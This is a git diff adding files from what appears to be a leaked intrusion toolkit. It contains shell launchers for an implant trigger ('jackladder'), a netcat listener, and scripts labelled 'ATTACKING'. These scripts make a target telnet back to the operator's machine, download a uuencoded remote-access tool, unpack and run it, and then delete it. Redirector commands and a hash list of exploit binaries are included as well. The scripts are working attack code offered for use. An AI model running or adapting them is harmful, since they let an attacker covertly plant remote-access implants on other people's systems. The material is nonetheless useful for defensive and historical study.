|
||||||
|
eval targ=\${$#} # note: doesn't handle port arg at end of command line
|
||||||
|
setupkeys $targ
|
||||||
|
dooptions $@ # this function sets up the $cmdln variable
|
||||||
|
ckupgrade
|
||||||
|
|
||||||
|
#
|
||||||
|
# If PRIME is set, then use pre v2.0 trigger format.
|
||||||
|
#
|
||||||
|
if [ "$(echo $PRIME)" ]; then
|
||||||
|
connect_so=$(type -path connect12.so)
|
||||||
|
fi
|
||||||
|
|
||||||
|
#
|
||||||
|
# Get command to run on target.
|
||||||
|
#
|
||||||
|
if [ "$REALCMD" != "" ]; then
|
||||||
|
cmd=$REALCMD
|
||||||
|
PORT=""
|
||||||
|
else
|
||||||
|
PORT=$(cat $wd/.PORT)
|
||||||
|
if [ -x "$(command -v readcmd)" ]; then
|
||||||
|
histfile=${wd}/.jl_history
|
||||||
|
readcmd -h $histfile -p "remote cmd: "
|
||||||
|
cmd=$(tail -1 $histfile)
|
||||||
|
else
|
||||||
|
echo -n "remote cmd: "; read cmd
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -e .TTY ] ; then
|
||||||
|
echo running: $cmd > $(cat .TTY)
|
||||||
|
else
|
||||||
|
echo running: $cmd
|
||||||
|
fi
|
||||||
|
echo
|
||||||
|
echo running: ${INBLESS}LD_PRELOAD=$connect_so CMD=+$cmd+ PORT=$PORT $cmdln
|
||||||
|
echo
|
||||||
|
|
||||||
|
# INBLESS is set in jacktelnet.sh to INBLESS="SU= HIDEME= HIDECON= " if
|
||||||
|
# IN is blessing us
|
||||||
|
|
||||||
|
eval $INBLESS LD_PRELOAD=$connect_so CMD="\$cmd" PORT=$PORT $cmdln
|
13
archive_files/bin/jl.nc
Executable file
13
archive_files/bin/jl.nc
Executable file
|
@ -0,0 +1,13 @@
|
||||||
|
#!/bin/bash
|
||||||
|
echo "Use ^c twice to stop ./jl.command..."
|
||||||
|
echo " 1 for nc, 1 for while loop"
|
||||||
|
while true; do
|
||||||
|
port=$RANDOM
|
||||||
|
echo
|
||||||
|
echo "---> Listening on $port <---"
|
||||||
|
echo
|
||||||
|
echo $port > /projects/etk/implants/jackladder/bin/.PORT
|
||||||
|
echo $(tty) > /projects/etk/implants/jackladder/bin/.TTY
|
||||||
|
nc -l -p $port
|
||||||
|
sleep 2
|
||||||
|
done
|
BIN
archive_files/bin/jp
Executable file
BIN
archive_files/bin/jp
Executable file
Binary file not shown.
BIN
archive_files/bin/readcmd
Executable file
BIN
archive_files/bin/readcmd
Executable file
Binary file not shown.
47
archive_files/bin/scotelnet.sh
Executable file
47
archive_files/bin/scotelnet.sh
Executable file
|
@ -0,0 +1,47 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
case "${#}" in
|
||||||
|
0|1|3|4|6)
|
||||||
|
echo " Usage: ${0} <rem_ip> <loc_ip> <localport> <base directory> <port>"
|
||||||
|
echo " ls -al biod.uu"
|
||||||
|
echo " nc -l -p 80 < biod.uu"
|
||||||
|
exit
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
REMOTEIP=$1
|
||||||
|
LOCALIP=$2
|
||||||
|
LOCALPORT=${3:-80}
|
||||||
|
BASEDIR=${4:-"/usr/tmp"}
|
||||||
|
PORT=${5:-25}
|
||||||
|
|
||||||
|
echo "ATTACKING: Remoteip $REMOTEIP"
|
||||||
|
echo "Localip=$LOCALIP Localport=$LOCALPORT Basedir=$BASEDIR"
|
||||||
|
echo "Port=$PORT"
|
||||||
|
|
||||||
|
if [ ! "$RA" = "" ]; then
|
||||||
|
echo "RA=\"$RA\""
|
||||||
|
fi
|
||||||
|
if [ ! "$RP" = "" ]; then
|
||||||
|
echo "RP=\"$RP\""
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo CommandLine: ${0} ${*}
|
||||||
|
|
||||||
|
REALCMD="N=/dev/null
|
||||||
|
D=$BASEDIR/.spool
|
||||||
|
PATH=:\$D:/bin:/usr/bin
|
||||||
|
touch -r $BASEDIR /tmp/.spl
|
||||||
|
mkdir -p -m700 \$D
|
||||||
|
cd \$D
|
||||||
|
w
|
||||||
|
(telnet $LOCALIP $LOCALPORT < /dev/console 2> /dev/null) |cat > .biod.uu
|
||||||
|
uudecode .biod.uu
|
||||||
|
uncompress -f biod.Z >\$N 2>&1 && chmod +x biod
|
||||||
|
PATH=. biod
|
||||||
|
rm \$D/biod \$D/.biod.uu
|
||||||
|
exit 0"
|
||||||
|
|
||||||
|
echo "/dev/null" > .TTY
|
||||||
|
export REALCMD
|
||||||
|
jl.command telnet $REMOTEIP $PORT
|
1
archive_files/bin/sgitelnet.sh
Symbolic link
1
archive_files/bin/sgitelnet.sh
Symbolic link
|
@ -0,0 +1 @@
|
||||||
|
suntelnet.sh
|
220
archive_files/bin/suntelnet.sh
Executable file
220
archive_files/bin/suntelnet.sh
Executable file
|
@ -0,0 +1,220 @@
|
||||||
|
#!/bin/sh
|
||||||
|
COLOR_NORMAL="\\033[0;39m"
|
||||||
|
SETCOLOR_NORMAL="echo -en $COLOR_NORMAL"
|
||||||
|
COLOR_NOTE="\\033[0;34m"
|
||||||
|
SETCOLOR_NOTE="echo -en $COLOR_NOTE"
|
||||||
|
SYNTAX="<rem_ip> <loc_ip> <localport> <targetdir> \\
|
||||||
|
<rat_file> [<jl_port>] [<rat_port> [nosy] ]
|
||||||
|
"
|
||||||
|
DEFJLPORT=13
|
||||||
|
PROG=`basename ${0}`
|
||||||
|
usage () {
|
||||||
|
echo "
|
||||||
|
Usage: [RA=redirector-address RP=redirector-port] $PROG \\
|
||||||
|
$SYNTAX
|
||||||
|
* RA and RP required if redirecting JL with jackpop
|
||||||
|
* jl is assumed to be in ./jl
|
||||||
|
* jl_port defaults to $DEFJLPORT (arg required if next arg is used)
|
||||||
|
* rat_port optional - default used if not given. BUT--if rat_port is
|
||||||
|
given and nopen is not being used, the final argument must be
|
||||||
|
nosy to send the older syntax up.
|
||||||
|
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /tmp/.X11R6 nscd
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /tmp/.X11R6 nscd 25 17348
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /tmp/.X11R6 nscd 113 33433 nosy
|
||||||
|
|
||||||
|
NOTE: You may now pre-set any/all of the following environment
|
||||||
|
variables if using jackpop with $PROG (RA & RP required).
|
||||||
|
|
||||||
|
For jl.command
|
||||||
|
locally: RA=redirector-address RP=redirector-port
|
||||||
|
|
||||||
|
For jackpop on LP=same-as-RP SA=your-source-IP
|
||||||
|
redirector: TA=target-address TP=target-JL-port
|
||||||
|
|
||||||
|
If you do not set LP and/or SA, they will be determined by the
|
||||||
|
<jl_port> parameter and ifconfig.
|
||||||
|
|
||||||
|
If you do not set TA and/or TP, you will be prompted for them.
|
||||||
|
"
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
case "${#}" in
|
||||||
|
0|1|2|3|4|9)
|
||||||
|
usage
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
REMOTEIP=$1
|
||||||
|
LOCALIP=$2
|
||||||
|
LOCALPORT=$3
|
||||||
|
TARGETDIR=$4
|
||||||
|
RAT_FILE=$5
|
||||||
|
JLPORT=$6
|
||||||
|
RAT_PORT=$7
|
||||||
|
RAT_NAME=$8
|
||||||
|
|
||||||
|
[ "$RAT_NAME" ] || RAT_NAME=nopen
|
||||||
|
|
||||||
|
PLATFORM=`uname`
|
||||||
|
if [ "$PLATFORM" = "Linux" ]; then
|
||||||
|
MINUSN=-n
|
||||||
|
else
|
||||||
|
MINUSN=""
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ "$JLPORT" = "" ]; then
|
||||||
|
JLPORT=$DEFJLPORT
|
||||||
|
fi
|
||||||
|
if [ "$RAT_PORT" != "" ]; then
|
||||||
|
if [ $RAT_PORT -lt 1025 -o $RAT_PORT -gt 65535 ]; then
|
||||||
|
echo rat_port must be between 1025 and 65535, inclusive
|
||||||
|
echo ""
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
if [ "$RAT_NAME" = "nosy" ]; then
|
||||||
|
RAT_ARG="P=$RAT_PORT "
|
||||||
|
else
|
||||||
|
if [ "$RAT_NAME" = "nopen" ]; then
|
||||||
|
RAT_ARG="D=\"-l $RAT_PORT\" "
|
||||||
|
if [ ! "`../bin/noclient | grep '2\.5'`" = "" ] ; then
|
||||||
|
RAT_ARG="D=\"-l $RAT_PORT\" "
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo rat_name $RAT_NAME is not nosy or nopen
|
||||||
|
echo ""
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
RAT_ARG=""
|
||||||
|
fi
|
||||||
|
|
||||||
|
JACKPOP=0
|
||||||
|
|
||||||
|
if [ ! "$RA" = "" ] || [ ! "$RP" = "" ] ; then
|
||||||
|
JACKPOP=1
|
||||||
|
if [ "$RA" = "" ] || [ "$RP" = "" ] ; then
|
||||||
|
echo "FATAL ERROR: Must have BOTH environment variables RA and RP set."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
if [ ! "$RP" = "$JLPORT" ] ; then
|
||||||
|
echo "Shouldn't RP=JLPORT?
|
||||||
|
(you have RP=$RP and JLPORT=$JLPORT)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
if [ ! "$RA" = "$REMOTEIP" ] || [ ! "$RA" = "$LOCALIP" ] ; then
|
||||||
|
echo "Shouldn't RA=LOCALIP=REMOTEIP? (you have
|
||||||
|
RA=$RA, LOCALIP=$LOCALIP
|
||||||
|
and REMOTEIP=$REMOTEIP)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
if [ ! "$TA" ] ; then
|
||||||
|
DEFTARGETIP=`egrep "^Target IP:" /current/etc/opscript.txt | awk '{print $3}' | head -1`
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the IP of your actual target you are redirecting
|
||||||
|
through $REMOTEIP to get to (this is used here to echo
|
||||||
|
a jackpop command to paste into your redirector): [$DEFTARGETIP]"
|
||||||
|
read TA
|
||||||
|
[ "$TA" ] || TA=$DEFTARGETIP
|
||||||
|
fi
|
||||||
|
if [ ! "$TP" ] ; then
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the actual target's JL trigger port (this is used here
|
||||||
|
to echo a jackpop command to paste into your redirector): [$DEFJLPORT] "
|
||||||
|
read TP
|
||||||
|
[ "$TP" ] || TP=$DEFJLPORT
|
||||||
|
fi
|
||||||
|
if [ ! "$LP" ] ; then
|
||||||
|
LP=$RP
|
||||||
|
fi
|
||||||
|
|
||||||
|
LOCAL_IP_GUESS=`ifconfig ppp0 2>/dev/null | grep inet | grep -v grep | grep -v ":127\." | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
# if that fails maybe it's on eth0
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || LOCAL_IP_GUESS=`ifconfig -a eth0 | grep inet | grep -v grep | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || echo "Unable to get local IP address..bailing"
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || exit 1
|
||||||
|
|
||||||
|
if [ "$SA" ] ; then
|
||||||
|
if [ ! "$SA" = "$LOCAL_IP_GUESS" ] ; then
|
||||||
|
echo "Shouldn't SA=LOCAL_IP_GUESS? (you have
|
||||||
|
SA=$SA and the local IP appears to be
|
||||||
|
$LOCAL_IP_GUESS."
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
SA=$LOCAL_IP_GUESS
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "CommandLine: $PROG ${*}"
|
||||||
|
|
||||||
|
REALCMD="N=/dev/null
|
||||||
|
D=$TARGETDIR
|
||||||
|
PATH=\$D:/bin:/usr/bin:/sbin:/usr/sbin:/usr/bsd
|
||||||
|
mkdir \$D
|
||||||
|
cd \$D
|
||||||
|
telnet $LOCALIP $LOCALPORT | cat > $RAT_FILE.uu
|
||||||
|
uudecode $RAT_FILE.uu
|
||||||
|
if [ ! -f $RAT_FILE.Z ]; then
|
||||||
|
telnet $LOCALIP 80
|
||||||
|
fi
|
||||||
|
uncompress -f $RAT_FILE.Z
|
||||||
|
chmod 777 $RAT_FILE
|
||||||
|
PATH=\$D ${RAT_ARG}${RAT_FILE}
|
||||||
|
exit 0"
|
||||||
|
export REALCMD
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo ""
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo ""
|
||||||
|
echo "New order of arguments is: "
|
||||||
|
echo "$PROG $SYNTAX"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
echo "REALCMD=\"$REALCMD\""
|
||||||
|
echo ""
|
||||||
|
echo "Command about to be executed:"
|
||||||
|
echo " ./jl.command telnet $REMOTEIP $JLPORT"
|
||||||
|
|
||||||
|
if [ "$JACKPOP" = 1 ] ; then
|
||||||
|
echo "
|
||||||
|
Using jackpop with environment variables as follows:
|
||||||
|
Redirector Address RA=$RA
|
||||||
|
Redirector Port RP=$RP
|
||||||
|
Target Address TA=$TA
|
||||||
|
Target Port TP=$TP
|
||||||
|
Listening Port on RA LP=$LP
|
||||||
|
Source Address SA=$SA
|
||||||
|
|
||||||
|
Now, some pastables. First, the jackpop command you need to run in an
|
||||||
|
INCISION window on $RA, then the -rtun command in a NOPEN window
|
||||||
|
on the same box, and finally an rm command to wipe jackpop: "
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo "
|
||||||
|
chmod 700 jp&&netstat -an|grep $LP||PATH=. SA=$SA TA=$TA TP=$TP LP=$LP jp
|
||||||
|
|
||||||
|
rm jp ; ls -al ; ls -al jp
|
||||||
|
|
||||||
|
-rtun $LOCALPORT
|
||||||
|
"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
fi
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo $MINUSN "hit enter to proceed, ^C to not: "
|
||||||
|
|
||||||
|
read junk
|
||||||
|
|
||||||
|
#now run jackladder
|
||||||
|
|
||||||
|
./jl.command telnet $REMOTEIP $JLPORT
|
BIN
archive_files/charm/charm/charm_hammer.linuxrh7.3.i686_v.1.0.0.3
Executable file
BIN
archive_files/charm/charm/charm_hammer.linuxrh7.3.i686_v.1.0.0.3
Executable file
Binary file not shown.
BIN
archive_files/charm/charm/charm_penguin.sunos5.8_v.2.0.1.4
Executable file
BIN
archive_files/charm/charm/charm_penguin.sunos5.8_v.2.0.1.4
Executable file
Binary file not shown.
BIN
archive_files/charm/charm/charm_razor.linux2.6.5-7.97-smp.i686_v.2.1.0.2
Executable file
BIN
archive_files/charm/charm/charm_razor.linux2.6.5-7.97-smp.i686_v.2.1.0.2
Executable file
Binary file not shown.
BIN
archive_files/charm/charm/charm_razor.win2k_v.2.0.0.1
Executable file
BIN
archive_files/charm/charm/charm_razor.win2k_v.2.0.0.1
Executable file
Binary file not shown.
BIN
archive_files/charm/charm/charm_saver.hpux11.00_v.2.0.0.2
Executable file
BIN
archive_files/charm/charm/charm_saver.hpux11.00_v.2.0.0.2
Executable file
Binary file not shown.
BIN
archive_files/charm/charm/charm_saver.win2k_v.2.0.0.2
Executable file
BIN
archive_files/charm/charm/charm_saver.win2k_v.2.0.0.2
Executable file
Binary file not shown.
165
archive_files/charm/tools.sha1sums.txt
Normal file
165
archive_files/charm/tools.sha1sums.txt
Normal file
|
@ -0,0 +1,165 @@
|
||||||
|
3DC70B280A3191CE13EA0AA37367D985162D89FB Fri Oct 19 17:51:32 2012 [PITCHIMPAIR.xx] charm_hammer.linuxrh7.3.i686_v.1.0.0.3
|
||||||
|
092290E03075FA55B66874398E72EE3956F15F3B Fri May 18 14:48:32 2012 [PITCHIMPAIR.xx] charm_penguin.sunos5.8_v.2.0.1.4
|
||||||
|
745A652564161CDD09BE5FB188D37F7029F6A167 Tue Jun 15 18:04:46 2010 [PITCHIMPAIR.xx] charm_razor.win2k_v.2.0.0.1
|
||||||
|
34288D6AEE12B7413901998B0E5ECD57A50980F6 Thu Nov 8 15:20:26 2012 [PITCHIMPAIR.xx] charm_razor.linux2.6.5-7.97-smp.i686_v.2.1.0.2
|
||||||
|
9B1608CD4BFCD8D6970187589AE999E0829C81B7 Thu Jun 3 16:21:12 2010 [PITCHIMPAIR.xx] charm_saver.hpux11.00_v.2.0.0.2
|
||||||
|
AA7D6B77B5C000314C856431883DF2B0D12EC046 Tue May 4 17:03:39 2010 [PITCHIMPAIR.xx] charm_saver.win2k_v.2.0.0.2
|
||||||
|
30B0CBBFB4F6F9CBF40A0A18E08B4C71231D2B1D Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.sparc_v.2.0.1.3
|
||||||
|
ED3FA710317E7D0BCDED864C7766E9D8530AE238 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.linux2.4.18-3_v.2.0.1.3
|
||||||
|
36821190B36342B1ED7C5FE185D3B4FD0F820B43 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.i386_v.2.0.1.3
|
||||||
|
5F5B1285967393B7A2485EBE3ADEF9D2047E4CA8 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.win2k_v.2.0.1.3
|
||||||
|
F52340918751E515BBF9B4B111EAFE81E28874E0 Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.hpuxb.11.00_v.2.0.1.3
|
||||||
|
1A0B601B7A2B72606D4193E5A5E7D4A610C9CA7F Thu May 17 14:23:42 2012 [PITCHIMPAIR.xx] crypttool.aix5.1_v.2.0.1.3
|
||||||
|
9096C1AA8ECEDA532F47F82572ED5534F33FA4C7 Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.sparc_v.2.1.0.2
|
||||||
|
937F493E538B96C29F48A5957B16B0356498998B Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.linux2.4.18-3_v.2.1.0.2
|
||||||
|
A69F4E110877B015D2909B8F54BC18169A589F47 Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.sunos5.8.i386_v.2.1.0.2
|
||||||
|
954F4778E5CD7A31B575B8C3C5B69A24D753E87B Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.win2k_v.2.1.0.2
|
||||||
|
80A7419E7A8CFD28E0E790F79AC518EEFEAE93CA Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.hpuxb.11.00_v.2.1.0.2
|
||||||
|
93249C66F57121DEBD98395E0B5A10517CA25DD4 Fri Dec 21 16:35:36 2012 [PITCHIMPAIR.xx] crypttool.aix5.1_v.2.1.0.2
|
||||||
|
908A7347F0622960E8225BF3206636111CBE0AED Mon May 3 12:24:51 2010 [PITCHIMPAIR.xx] cursebongo.sunos5.8_v.2.0.0.1
|
||||||
|
0D4A01E9C4F0683078650DD94CCE24BAE65168C5 Tue Jun 5 13:16:47 2012 [PITCHIMPAIR.xx] curseclash.aix5.1.powerpc_v.1.0.1.1
|
||||||
|
C81DAF1D7D76DA410857A90953E8D7A1909D948F Wed Oct 10 11:44:56 2012 [PITCHIMPAIR.xx] curseclash_flx.sunos5.8.sparc_v.1.0.0.3
|
||||||
|
93E018FB88F01C223B11C4F6026E321B29A59853 Wed Oct 10 11:44:56 2012 [PITCHIMPAIR.xx] curseclash_flx.aix5.1.powerpc_v.1.0.0.3
|
||||||
|
4635E05651DBCD3F2EDA4A174D7C33F01DE1C9C3 Wed Jun 15 12:36:05 2011 [PITCHIMPAIR.xx] cursedevo.sunos5.8_v.1.0.0.3
|
||||||
|
E4A544206B0501E67F16A26093428AC334A973E5 Fri Dec 7 21:11:59 2012 [PITCHIMPAIR.xx] cursefire.linuxrh7.3.i686_v.1.1.0.2
|
||||||
|
19ABD4D601359BB4ECF8B9697DAAA7F6BEA9F402 Mon Jun 4 12:39:14 2012 [PITCHIMPAIR.xx] cursefire.sunos5.8.sparc_v.1.0.0.3
|
||||||
|
DCD5465C9327A0AFE309A116AB428B6EA95B60FE Tue Aug 11 16:34:57 2009 [PITCHIMPAIR.xx] curseflower.mswin32_v.1.0.0.3
|
||||||
|
475EE14BB59E2CBF1625AC75C269F44C0577E5D0 Wed Oct 10 11:33:56 2012 [PITCHIMPAIR.xx] cursegismo.sunos5.8.sparc_v.2.2.0.2
|
||||||
|
327901EDA008636E3A944B82D44FF16F14A863AE Wed Oct 10 11:33:56 2012 [PITCHIMPAIR.xx] cursegismo.sunos5.8.i386_v.2.2.0.2
|
||||||
|
C6BEF72471D15F33FEACE85D10CB0F3AD8C1AE78 Wed Oct 10 11:33:56 2012 [PITCHIMPAIR.xx] cursegismo.linuxrh7.3.i686_v.2.2.0.2
|
||||||
|
84B2DDBE9ECACCA5E786079C314AB1F0C935A401 Wed Jan 27 16:36:17 2010 [PITCHIMPAIR.xx] cursegismo.linuxrh7.3_v.2.0.0.2
|
||||||
|
90B50B531E0DB2DFDF885F23E531973B1C85DF24 Wed Jan 27 16:36:17 2010 [PITCHIMPAIR.xx] cursegismo.sunos5.8_v.2.0.0.2
|
||||||
|
3DE069D24A523C10A1F2CF6E53DB86DE4878CA40 Wed Jan 27 16:36:17 2010 [PITCHIMPAIR.xx] cursegismo.hpuxb.11.00_v.2.0.0.2
|
||||||
|
7B73F0EB39A434DAB80BE1F5240AAA8ED3499C28 Fri Feb 11 18:14:28 2011 [PITCHIMPAIR.xx] cursegismo.sunos5.8.i386_v.2.1.0.1
|
||||||
|
CAB5155EF63DC824DE53568A639735310C35EF22 Fri Feb 11 18:14:28 2011 [PITCHIMPAIR.xx] cursegismo.linuxrh7.3_v.2.1.0.1
|
||||||
|
78DA2E62CD6A53B75A38A41DC65950BA10828D87 Fri Feb 11 18:14:28 2011 [PITCHIMPAIR.xx] cursegismo.sunos5.8_v.2.1.0.1
|
||||||
|
91ACE7E5E2073367D810C933E10ABF35432094F7 Fri Feb 11 18:14:29 2011 [PITCHIMPAIR.xx] cursegismo.hpux11.00_v.2.1.0.1
|
||||||
|
133041F8A5206116CF4A14883BC93DD53641C00B Mon Apr 12 14:32:04 2010 [PITCHIMPAIR.xx] cursegismo.sunos5.8.i386_v.2.0.0.5
|
||||||
|
6485249152B9A0DCC327D80F400275CA0703773C Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.win2k_v.6.0.0.1
|
||||||
|
D0E3E98DA05D29FB9802291E744EF1667582D756 Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.rhl7.3_v.6.0.0.1
|
||||||
|
96CE881EA4546F46961475A9D6B0BF40D1B7BE31 Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.hp-uxb.11.00_v.6.0.0.1
|
||||||
|
16C7C11BD8C70F333F16341ABA0DB2BAAD0904FC Mon Mar 1 16:58:42 2010 [PITCHIMPAIR.xx] cursehappy.sunos5.8_v.6.0.0.1
|
||||||
|
00D54B5F950A377E900B64B565DA58FD014EB672 Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.sunos5.8_v.6.1.0.1
|
||||||
|
EDA9AD9BE6CCBCCCDD96EEEADF2E744E4297A5C0 Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.hpux11.00_v.6.1.0.1
|
||||||
|
E79BCE98D9F64ED71CFCA7C6C507FC7723F9861A Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.win2k_v.6.1.0.1
|
||||||
|
D83037BC4E025BABA874E5BBA4079C4205B9B264 Thu Aug 19 19:53:54 2010 [PITCHIMPAIR.xx] cursehappy.linuxrh7.3_v.6.1.0.1
|
||||||
|
AAB569E5B3643DBE07F981EFA6E1F2D68E25B723 Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.linuxrh7.3.unknown_v.6.2.0.3
|
||||||
|
4214A7541803C3AC87C3C491487F11E96FC4B058 Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.hpux11.00.risc_v.6.2.0.3
|
||||||
|
A41EE20E65397DCE5F288B748A52C6D6C4F9154A Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.win2k.i686_v.6.2.0.3
|
||||||
|
397DF64863C130F5BD3C8A1E179C86CD6B48F23F Tue Nov 8 16:44:22 2011 [PITCHIMPAIR.xx] cursehappy.sunos5.8.sparc_v.6.2.0.3
|
||||||
|
AA227C89ACE731945DC53ACF7DC90DECB4C2DBE4 Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.win2k_v.2.1.0.2
|
||||||
|
0D151AB49A9974844A0089B9C576AA6218479512 Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.sunos5.8_v.2.1.0.2
|
||||||
|
2B6ABB47B4C5DF369A794A6FED08CD476470C9FC Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.hpux11.00_v.2.1.0.2
|
||||||
|
0D42734F8F15EDFFB3B73A6DFDE6FC60DC2FC045 Thu Sep 2 11:33:10 2010 [PITCHIMPAIR.xx] cursehelper.aix5.1_v.2.1.0.2
|
||||||
|
FBF7334531AED88C938B61F394FFAAC0FB01D38E Tue Mar 6 12:16:44 2012 [PITCHIMPAIR.xx] cursehelper.win2k.i686_v.2.2.0.4
|
||||||
|
733D6939BD35C01661017299D21DA157EF4FF210 Fri Feb 10 16:05:35 2012 [PITCHIMPAIR.xx] cursehelper.sunos5.8.sparc_v.2.2.0.4
|
||||||
|
68DA058E84F85135CC93836394FE2AA761DAA712 Tue Mar 6 12:16:37 2012 [PITCHIMPAIR.xx] cursehelper.aix5.1.powerpc_v.2.2.0.4
|
||||||
|
5346758117978E6DD9614D06E03F1139436D3BB3 Tue Mar 6 12:16:41 2012 [PITCHIMPAIR.xx] cursehelper.hpux11.00.risc_v.2.2.0.4
|
||||||
|
3DA7D89E3971659334780BEC8B6A41DC57BCD800 Wed Apr 17 12:30:09 2013 [PITCHIMPAIR.xx] cursehelper.linuxrh7.3.i686_v.2.2.1.1
|
||||||
|
0BF3892053FB4F3B9781C0AF0FCB807B5DE8C1DD Tue Jul 10 17:05:24 2012 [PITCHIMPAIR.xx] cursehelper.sunos5.8.i386_v.2.2.0.4
|
||||||
|
3BC7ADFF5142E362048E633ADBE6BF4389B9CB85 Thu Feb 28 16:55:12 2013 [PITCHIMPAIR.xx] cursehole_flx.aix5.1.powerpc_v.1.0.0.4
|
||||||
|
E445C73287B999AC7285765B6EF6FE872A0685F6 Tue Feb 12 14:32:02 2013 [PITCHIMPAIR.xx] cursehole_flx.sunos5.8.sparc_v.1.0.0.3
|
||||||
|
B8009CA04040EBECE514073BD822DA91C3DB7A32 Wed May 16 14:26:19 2012 [PITCHIMPAIR.xx] cursekettle.hpux11.00.risc_v.1.1.0.2
|
||||||
|
ED00A5537A9F0CD8E7E58F6693C607BB33AD7748 Mon Jun 13 18:22:03 2011 [PITCHIMPAIR.xx] cursekiln.sunos5.8_v.1.0.0.2
|
||||||
|
BFAF9F5CF11D26ED93A4BF6359D7AF02A298343C Fri Dec 2 15:23:34 2011 [PITCHIMPAIR.xx] cursekiln.sunos5.8_v.1.0.1.3
|
||||||
|
9BD3FEB3AE384C1592ACC5FEC2B0F8BB740BC405 Fri Apr 9 10:41:47 2010 [PITCHIMPAIR.xx] cursemagic.linuxrh7.3_v.2.0.0.1
|
||||||
|
230335E9756A226A95B86C8EA709320959A3AFE5 Fri Apr 9 10:39:17 2010 [PITCHIMPAIR.xx] cursemagic.solaris5.8_v.2.0.0.1
|
||||||
|
FB1B509AB5167368EE71CA93EECFAAD66D4765C1 Tue Apr 20 18:58:26 2010 [PITCHIMPAIR.xx] cursemagic.solaris5.8_v.2.0.1.1
|
||||||
|
F3D41481F353EE9AC9ED9777F12FFFBAEB814C7F Tue Apr 20 18:58:26 2010 [PITCHIMPAIR.xx] cursemagic.linuxrh7.3_v.2.0.1.1
|
||||||
|
5BD539E66B8EFBC1E6077F22F3CC850E9487222D Wed Apr 21 16:17:24 2010 [PITCHIMPAIR.xx] cursemagic.hpux11.00_v.2.0.1.1
|
||||||
|
26EB533FA7E3EA9559FD71E3B6C470497C3B25F4 Wed Apr 21 16:17:29 2010 [PITCHIMPAIR.xx] cursemagic.aix5.1_v.2.0.1.1
|
||||||
|
F191378B2B009A1DAF0DBEB5F066AC1D981CF12E Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.aix5.1_v.2.1.0.3
|
||||||
|
D1BBDA568B0EFBEEC395203C67659B154A1523FA Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.linuxrh7.3_v.2.1.0.3
|
||||||
|
4E5418CB07531150AF21CFEF2E61CFBC7AA7841F Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.sunos5.8_v.2.1.0.3
|
||||||
|
4DD9975EF41041B5EBB7436D0133E5D2E94AAF36 Fri Oct 14 15:40:04 2011 [PITCHIMPAIR.xx] cursemagic.hpux11.00_v.2.1.0.3
|
||||||
|
